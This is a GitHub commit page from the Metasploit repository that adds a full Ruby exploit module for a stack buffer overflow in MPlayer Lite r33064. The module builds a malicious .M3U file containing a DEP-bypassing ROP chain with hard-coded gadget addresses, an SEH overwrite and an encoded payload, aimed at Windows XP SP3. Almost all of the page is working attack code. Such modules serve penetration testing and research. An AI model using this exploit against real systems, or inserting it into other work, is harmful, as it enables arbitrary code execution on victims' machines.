-
Notifications
You must be signed in to change notification settings - Fork 13.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #2910 - MPlayer Lite M3U Buffer Overflow
- Loading branch information
Showing
1 changed file
with
118 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,118 @@ | ||
## | ||
# This module requires Metasploit: http//metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
require 'msf/core' | ||
|
||
class Metasploit3 < Msf::Exploit::Remote | ||
Rank = AverageRanking | ||
|
||
include Msf::Exploit::FILEFORMAT | ||
include Msf::Exploit::Seh | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'MPlayer Lite M3U Buffer Overflow', | ||
'Description' => %q{ | ||
This module exploits a stack-based buffer overflow vulnerability in | ||
MPlayer Lite r33064, caused by improper bounds checking of an URL entry. | ||
By persuading the victim to open a specially-crafted .M3U file, specifically by | ||
drag-and-dropping it to the player, a remote attacker could execute arbitrary | ||
code on the system or cause the application to crash. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => | ||
[ | ||
'C4SS!0 and h1ch4m', # Vulnerability discovery and original exploit | ||
'Gabor Seljan', # Metasploit module | ||
], | ||
'References' => | ||
[ | ||
[ 'BID', '46926' ], | ||
[ 'EDB', '17013' ], | ||
[ 'URL', 'http://www.mplayer-ww.com/eng/' ] | ||
], | ||
'DefaultOptions' => | ||
{ | ||
'ExitFunction' => 'process' | ||
}, | ||
'Platform' => 'win', | ||
'Payload' => | ||
{ | ||
'BadChars' => "\x00\x20\x0d\x0a\x1a\x2c\x2e\x26\x2f\x3a\x3e\x3f\x5c", | ||
'Space' => 5040 | ||
}, | ||
'Targets' => | ||
[ | ||
[ 'Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064', | ||
{ | ||
'Offset' => 21, | ||
'Ret' => 0x649a7bbe # ADD ESP,64C # PPPR [avformat-52.dll] | ||
} | ||
], | ||
], | ||
'Privileged' => false, | ||
'DisclosureDate' => 'Mar 19 2011', | ||
'DefaultTarget' => 0)) | ||
|
||
register_options( | ||
[ | ||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']) | ||
], | ||
self.class) | ||
|
||
end | ||
|
||
def junk | ||
return rand_text_alpha(4).unpack("V").first | ||
end | ||
|
||
def nops | ||
return make_nops(4).unpack("V").first | ||
end | ||
|
||
def exploit | ||
|
||
# ROP chain generated by mona.py - See corelan.be | ||
rop_gadgets = | ||
[ | ||
0x6ad9d85d, # POP EBP # RETN [avcodec-52.dll] | ||
0x10018fc3, # &CALL ESP [unrar.dll] | ||
0x64984a70, # POP EAX # RETN [avformat-52.dll] | ||
0xffffec4f, # Value to negate, will become 0x00005040 | ||
0x6b0ce791, # NEG EAX # RETN [avcodec-52.dll] | ||
0x6b063c7d, # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll] | ||
junk, | ||
junk, | ||
0x1001d154, # POP EAX # RETN [unrar.dll] | ||
0x77e71210, # &VirtualProtect() [IAT RPCRT4.dll] | ||
0x64987f7f, # MOV EAX,DWORD PTR DS:[EAX] # RETN [avformat-52.dll] | ||
0x6afcdc68, # XCHG EAX,ESI # RETN [avcodec-52.dll] | ||
0x6b02836d, # POP EAX # RETN [avcodec-52.dll] | ||
0xffffffc0, # Value to negate, will become 0x00000040 | ||
0x6b0ce791, # NEG EAX # RETN [avcodec-52.dll] | ||
0x6af79d80, # XCHG EAX,EDX # RETN [avcodec-52.dll] | ||
0x1001bad6, # POP ECX # RETN [unrar.dll] | ||
0x649eab48, # &Writable location [avformat-52.dll] | ||
0x6d7c0bb7, # POP EDI # RETN [swscale-0.dll] | ||
0x6b03d722, # RETN (ROP NOP) [avcodec-52.dll] | ||
0x64984a70, # POP EAX # RETN [avformat-52.dll] | ||
nops, | ||
0x6d7c57d1 # PUSHAD # RETN [swscale-0.dll] | ||
].flatten.pack('V*') | ||
|
||
sploit = rand_text_alpha_upper(target['Offset']) | ||
sploit << rop_gadgets | ||
sploit << payload.encoded | ||
sploit << generate_seh_record(target.ret) | ||
sploit << rand_text_alpha_upper(1000) # Generate exception | ||
|
||
# Create the file | ||
print_status("Creating '#{datastore['FILENAME']}' file ...") | ||
file_create("http://" + sploit) | ||
|
||
end | ||
end | ||
|